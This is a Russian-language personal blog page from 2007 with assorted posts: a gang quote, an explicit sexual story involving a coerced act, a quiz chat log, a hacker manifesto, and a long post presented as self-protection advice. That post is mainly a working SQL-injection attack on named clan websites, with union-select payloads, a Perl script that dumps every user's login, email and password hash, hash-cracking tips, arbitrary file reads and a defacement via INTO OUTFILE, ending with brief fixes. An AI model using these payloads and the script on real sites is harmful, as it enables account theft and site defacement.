|
| updated 18.02.08 16:52 07.12.07 16:49 |
Anzer   | Навеяло |
ru |
http://quaddon.on.ufanet.ru/
Пройдя по ссылке, кликните кнопку "жми". И не забудьте включить звук...
Mood: задумчивое 
|
| Comments: 9 | |
| |
|
|
| 14.11.07 08:30 |
чиппи-гламур | Торговля наркотиками .. |
ru |
Ты живешь ради Бога и матери - умираешь ради банды .. (c) Mara Salvatrucha Terce
|
|
| |
|
|
| 08.10.07 04:41 |
чиппи-гламур | mara salvatrucha |
ru |
|
| Comments: 1 | |
| |
|
|
| 28.09.07 23:49 |
чиппи-гламур | Про женский интелект и про минет .. |
ru |
Йа нехотя продрал глаз .. Ну и че , надо кому-то в 10 утра звонить в мою бронированую дверь в квартиру? .. Да так настойчиво ...
В голову пришла мысль , что стоит так и пойти , в одних трусах по-колено и в пуфиках .. Так и пошел ..
- Привет , я не хотела тебя будить ..
- Так а че будила? ..
- Не знаю , просто наверное извиниться хотела ..
- За что?
На лице появилась невинная улыбка ..
- Я думала я в чем-то виновата перед тобой , можно я зайду?
Кивнул , она переступила порог ..
Я оттянул горло кофточки , чтобы посмотреть на ее грудь да и узнать в лифчике она вообще. Не , ниче нету , как обычно голая пухленькая грудь и торчащие соски..
Она улыбнулась и посмотрела вниз ,- то-ли на мою руку , то-ли на свое тело..
Когда она приблизила лицо ко мне , приоткрыла губы для поцелуя - йа уклонился ладонью надавил на ее макушку , заставляя нагнуться ..
Когда она двигала головой , я так и стоял с опущеными руками и смотрел в дверь..
Сперма попала ей на кофточку , на волосы и на брови .. Отвернулся и пошел в душ.. Когда я вышел - ее не было ..
**
Она пришла домой , скинула вещи , переоделась и села в кресло .. Через 30 мин пришел Андрей с работы - веселый и жизнерадосный архитектор..
-Привет маленькая , как дела ..
Она молчит ..
-Что такое?
Когда она тихонько расплакалась , Андрей испугался , подошел поближе..
-Ну что ты , что случилось?
-Андрей , я сама себя понять не могу .. Я не знаю что я могу в этой жизни и что я хочу ..
она плакала
Андрей начал утешать ее и шептать нежные слова..
-Ну что ты , успокойся .. Я тебя люблю ..
Андрей ощутил что его тело трепещет от этих слов ..
Она перестала плакать и посмотрела на него
-Правда любишь?
-Да ..
-Я тебя тоже люблю ..
Андрей присел на краешек кресла и нежно обнял ее..
-Все хорошо , пойдем погуляем .. Сходим в ботанический сад ..
Она уткнулась носом в его грудь ..
-Ты разве не устал с работы?
-Нет ..
***
Я лежал на диване и смотрел в стену .. Без мыслей .. тупо ..
Звонок..
- Привет , ты не спишь ?
-Нет...
-Я хотела извиниться ..
-За что?
-Я думала ты обижаешься , за то что я ушла ..
-Нет ..
-Просто я хочу извиниться за все ..
-И че? ..
Конец ..
|
| Comments: 4 | |
| |
|
|
| 21.09.07 15:58 |
чиппи-гламур | гыыы ... |
ru |
<-ВИКТОРИНА-> Вопрос № 13593 из 88230.
----------------------------------------------------------------------
> Очки: 5 - Варианты ответов: 1
Вопрос: временная легкая постройка для жилья, разновидность палатки из ткани, кожи и т.п.
(обычно сооружаемая в форме конуса).
Подсказка: @@@@@
<1> вигвам
<1> шалаш
<1> !
<1> шалаш
<1> вашу мать шалаш это!
<1> шолаж
<-ВИКТОРИНА->Подсказка: ш@@@@
<1> шалащ
<1> твайу дивизию
<1> шалаж сука
<1> шалаж
<-ВИКТОРИНА->Подсказка: ша@@@
<1> твайу мать!!!
<1> шалаш
<2> шатер
<-ВИКТОРИНА-> На этот вопрос правильно ответил: 2, Ответ был: "шатер".
<2> )))
<1> мля)))))
йа каталсо =)
|
|
| |
|
|
| 20.08.07 01:16 |
чиппи-гламур | hacked |
ru |
|
Теперь это наш мир , мир электронов и выключателей , мир красоты ботов. У нас нет национальностей , цвета кожи и религиозных убеждений. ВЫ ведете войны , убиваете, обманываете нас , и хотите чтобы мы верили будто вы добродетели , а мы преступники... Да я преступник , я виновен в любознательности , я ХАКЕР и это мой манифест... ВЫ можете поймать меня , но вам не остановить всех...
|
| Comments: 2 | |
| |
|
|
| 16.06.07 03:55 |
чиппи-гламур | защити себя сам |
ru |
Для примера использован сайт клана Cossacks Of Hell
В связи с последними событиями в БК , я решил провести исследования клансайтов ..
К сожалению , как оказалось , большая часть подвержена серьезным уязвимостям..Я хочу рассказать вам и сберечь вас от наиболее распространенных..
Как оказалось 80% просмотренных мною клансайтов имеют схожие уязвимости - сиквэл инъекции , что далеко не странно , тк у программистов не хватает больше ума как использовать стандартные проверки в скриптах при обращении к реляционной базе данных..Зачем думать головой , если можно содрать уже написанное ? =))
Зачастую , о наличии сиквэл инъекции могут сказать ошибки , явно указывающие, что произошла ошибка в sql запросе. В тоже время о наличии ошибки в сиквэл запросе можно судить и по косвенным признакам ..
Чтобы реализовать наш с вами взлом давайте найдем параметр , значения которого передаются в запросе к БД.. Это достаточно просто , как правило это может быть параметр для обращения к новостной ленте , галлерии , списку статей , панели регестрации итд ..
структура такого запроса
http://site/test.php?id=номер статьи или новости
естественно , любой нормальный человек , увидев такое в строке запроса или в сорсе кода начнет сУвать туда всякую херь =)
http://site/test.php?id=9999
http://site/test.php?id=ааа
http://site/test.php?id=0
http://site/test.php?id=-0
http://site/test.php?id=-1000
итд
в 10 сайтах , уже на этом этапе я получил ошибку , связанную с неверным сиквэл запросом
Некоторые программисты наивно полагают , что их спасет заключение параметра в одиночные ковычки - ' и ошибочная фильтрация символов.. бугага =)
что-нить типо
<?php
$param=preg_replace("/[a-zA-Z0-9]i","",$param);
?php>
---------------------------------------------------------------------------
если исследуя скрипт выше мы еще не получили ошибки , продолжим =))
http://site/test.php?id=-1'+/*
таким нехитрым маневром мы закрываем первую кавычку и ставим незакрытый сиквэл комментарий , который превращает следующий в запросе код в бесполезную информацию.
вуаля =))
*
Следует отметить , что вы можете и не получать вывод ошибочного запроса , но если в результате ковыряния параметра вы получаете редирект на главную страницу , или еще лучше страницу с пустым запросом или 500 ошибкой шттп - вы на верном пути и правильно выбрали атакуемый параметр ..
*
Дальше можно было бы и не писать ничего , если бы я не сомневался в профессионализме прогеров ..
далее начинаем подбирать верный запрос к таблице , туд , методом перебора выясняется номер столбца с выводом. Нам понадобится знать, в каком по счету столбце происходит вывод на страницу
http://site/test.php?id=-1'+union+select+null/*
если и такой запрос выдаст ошибку синтаксиса или пустую страницу , значит в скрипте, возможно имеется проверка на не пустоту одного из параметров ...
тогда идем конём ..
http://site/test.php?id=-1'+union+select+1/*
еееееее
http://site/test.php?id=-1'+union+select+1,2,3 итд/*
http://site/test.php?id=-1'+union+select+null,null,null,null,null,null,null/*
или если фильтруется пробуем
http://site/test.php?id=-1'+union+select+1,2,3,4,5,6,7/*
вуаля =))
Теперь можно перебирать имена таблиц .. Правильные запросы будут соответствовать существующим именам таблиц .. Наверно , интересно будет проверить на существование таблиц users , passwords , regusers и тд и тп ..
Если выводиться только одна строка из запроса (например , вместо тела статьи) , то можно передвигаться по строкам путем limit ..
http://site/test.php?id=-1'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit+1,1/*
вуаля =))
*отдельно стоит рассказать про сиквэл функцию char() .. в качестве аргумента она принимает десятичный код ASCII символа , это нужно в том случае , когда скриптом фильтруются нужные символы...
например char(47) вернет нам / , когда если бы мы отослали его напрямую этот символ бы отфильтровался ..
*
Итак - мы имеем пароли в мд5 , логины и почтовые ящики пользователей .. (n делить на два , потом n деленное на два разделить на два итд)
Методом мат. анализа определяем , что записей в phpbb_forum тут 489 .. Анализируем сорс ошибки..
и пишем несложный скрипт на перле
не люблю я пхп =))
#!/usr/bin/perl -w
use LWP;
use strict;
my $ua=LWP::UserAgent->new;
my $i;
my $res;
$path='путь к уязвимости=-1\'+union+select+1,concat(username,char(58),user_email,char(58),user_password),3,4,5,6,7+from+phpbb_users+limit';
for ($i=1;$i<=488;$i++) {
my $res=$ua->request(HTTP::Request->new(GET=>$path.'+'."$i".',1/*'));
if ($res->is_success) {
$res->content=~/<center>Запрещено просматривать статью '(.*):(.*):(.*)'/;
open (LOG,">>list") || die " cant open file";
print LOG $1.':'.$2.':'.$3."\n";
close LOG;
} else {
print $res->status_line;
}
}
В кратце - используем модуль лвл для последовательного гет запроса ко всем строкам таблицы , выделяем из сорса нужные тэги , а из них в свою очередь - логины , пароли и мэйлы ..
вуаля =))
в фале list , в одной корневой со скриптом через 2 мин у нас вся база данных сайта =))
кидаем пароли клана на подбор в любую утилиту для штурма мд5
и вуаля , через минуту у нас уже пасс от одного соклана ..
а еще через два дня , от половины
но какого же будет ваше удивление , когда в ответ на инъекцию
http://site/test.php?id=-1'+union+select+1,LOAD_FILE(''),3,4,5,6,7/*
вы получите
сайтик то , на винде стоит , а это увеличивает полет фантазии вдвое
нам на самом деле и не нужны пароли , их можно и не качать ..
Достаточно написать что - нить типа
http://site/test.php?id=-1'+union+select+1,LOAD_FILE('путь к любому файлу на диске C:\'),3,4,5,6,7/*
для просмотра любого скрипта
и
http://site/test.php?id=-1'+union+select+1,'',2,3,4,5,6,7+from+phpbb_forum+into+outfile+'C:\usr\local\site\www\index.php'/*
для дефейса .. те подмены главной страницы .. да и вообще стереть любой файл можно ..
или закачать свое ..
Похожие уязвимости я нашел почти на всех топ клан сайтах ..
Даркклан , рмиб и пачке других..
Попытаться исправить это можно путем
- для целых и дробных величин , перед их использованием в запросе надо привести величину к нужному типу ..
$id=(int)$id; $total=(float)$total;
Вместо этого можно вставить систему слежения за тестированием на сиквэл инъекцию ..
if((string)$id<>(string)(int)$id) {
// пишем в лог о попытке ..
die('ops');
}
- для строковых параметров , которые не используются в like , regexp и тд , экранируем кавычки ..
$str=addslashes($str);
или , лучше я всегда советовал
mysql_escape_string($str)
- в строках , которые предполагается использовать внутри like , regexp и тд , необходимо так же заэкранировать специальные символы , применяющиеся в этих операторах , если это необходимо.. В противном случае , можно задокументировать использование этих символов ..
На прощание хочу сказать - никогда не ждите благодарностей от людей..
удачи , и помните - если жизнь свернула вас как удав , терпите =)))
hacked by 4
hacked by RaD
отдельное спасибо Diogen-у
|
| Comments: 19 | |
| |
|
|
| 09.06.07 07:31 |
чиппи-гламур | Ты следующий .. |
ru |
|
| Comments: 2 | |
| |
|
|
| 09.06.07 04:08 |
чиппи-гламур | Осенило |
ru |
|
Я пришел к выводу что Жоф - дятел , ничего личного ..
|
|
| |
|
Total posts: 48 Pages: 5
1 2 3 4 5
|
|
| Mo |
Tu |
We |
Th |
Fr |
Sa |
Su |
| | | | | | 1 | | 2 | 3 | 4 | 5 | 6 | 7 | 8 | | 9 | 10 | 11 | 12 | 13 | 14 | 15 | | 16 | 17 | 18 | 19 | 20 | 21 | 22 | | 23 | 24 | 25 | 26 | 27 | 28 | 29 | | 30 | | | | | | |
|
